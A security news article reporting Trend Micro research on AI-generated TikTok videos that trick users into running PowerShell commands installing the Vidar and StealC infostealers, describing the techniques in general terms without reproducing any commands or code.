Fake Software Activation Videos on TikTok Spread Vidar, StealC Malware
Cybercriminals are using fake software activation videos on TikTok to trick users into running commands that install the Vidar and StealC malware. These malicious videos have been viewed over 500,000 times, increasing the threat's reach via TikTok's algorithm.
The researchers at Trend Micro reported that these videos disguise themselves as legitimate software activation steps for tools like Windows, Office, CapCut, or Spotify. However, when users run the PowerShell commands embedded in these videos, they download and install the Vidar and StealC malware. These malware payloads set up persistence via the registry, add Windows Defender exclusions, and delete traces to avoid detection.
The attackers are using AI-generated TikTok videos to spread Vidar and StealC malware. The researchers discovered that several TikTok accounts have been deactivated after posting these likely AI-generated videos. The similarities between these videos suggest that they were created using automated tools for both visuals and voice, making them nearly identical.
One particularly convincing video gained nearly 500,000 views, 20,000+ likes, and 100+ comments, showing high engagement and trust among users. This script provides step-by-step instructions to run a PowerShell command that downloads the malware. The attackers use legitimate services like Steam and Telegram as Dead Drop Resolvers (DDR) to hide C&C details and embed server info in public profiles to avoid detection.
Vidar uses direct IP connections, while StealC uses these methods to obscure infrastructure and maintain persistence while reducing visibility to security tools. This method highlights the need for a reassessment in defense strategies against social media-based malware attacks.
The report concludes that traditional security controls are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies must adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user education to combat these threats.
Conclusion
As the popularity of social media platforms continues to grow, cybercriminals are adapting their tactics to exploit user trust. The spread of fake software activation videos on TikTok using AI-generated content highlights the need for a more comprehensive approach to cybersecurity.
Stay ahead of these threats by staying informed and up-to-date with the latest security news and trends. Follow me on Twitter: @securityaffairs and Facebook, and Mastodon to stay informed about the latest cybersecurity threats.